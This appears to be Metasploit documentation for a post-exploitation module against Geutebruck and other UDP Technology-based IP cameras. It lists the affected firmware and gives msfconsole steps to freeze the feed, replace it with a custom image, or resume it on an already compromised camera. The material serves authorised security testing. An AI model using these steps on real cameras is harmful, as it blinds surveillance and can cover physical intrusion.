Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/post/linux/manage/geutebruck_post_exp.md
Views: 11789
Vulnerable Application
The following Geutebruck products using firmware versions <= 1.12.0.27, firmware version 1.12.13.2 or firmware version 1.12.14.5:
Encoder and E2 Series Camera models:
G-Code:
EEC-2xxx
G-Cam:
EBC-21xx
EFD-22xx
ETHC-22xx
EWPC-22xx
Many brands use the same firmware:
UDP Technology (which is also the supplier of the firmware for the other vendors)
Ganz
Visualint
Cap
THRIVE Intelligence
Sophus
VCA
TripCorps
Sprinx Technologies
Smartec
Riva
This module has been tested on a Geutebruck 5.02024 G-Cam EFD-2250 running the latest firmware version 1.12.0.27.
Description
This module will take an existing session on a vulnerable Geutebruck Camera and will allow the user to either freeze the camera and display the last image from the video stream, display an image on the camera, or restore the camera back to displaying the current feed/stream.
Users can find additional details of the related vulnerabilities on the blogpost page at https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/.
Verification Steps
Freezing camera stream on the current image
Launch
msfconsole
Get a shell using one of the published Getebruck exploits
Do:
use post/linux/manage/geutebruck_post_exp
Do:
set SESSION <session number of the Geutebruck shell>
Do:
set action FREEZE_CAMERA
Do:
run
The image should be frozen
Replacing camera stream with a custom image
Launch
msfconsole
Get a shell using one of the published Getebruck exploits
Do:
use post/linux/manage/geutebruck_post_exp
Do:
set SESSION <session number of the Geutebruck shell>
Do:
set action REPLACE_IMAGE
Do:
set IMAGE /local/image/path/to/upload
Do:
run
The image should be replaced by the custom one
Restoring the current camera stream
Launch
msfconsole
Get a shell using one of the published Getebruck exploits
Do:
use post/linux/manage/geutebruck_post_exp
Do:
set SESSION <session number of the Geutebruck shell>
Do:
set action RESUME_STREAM
Do:
run
The stream should be resumed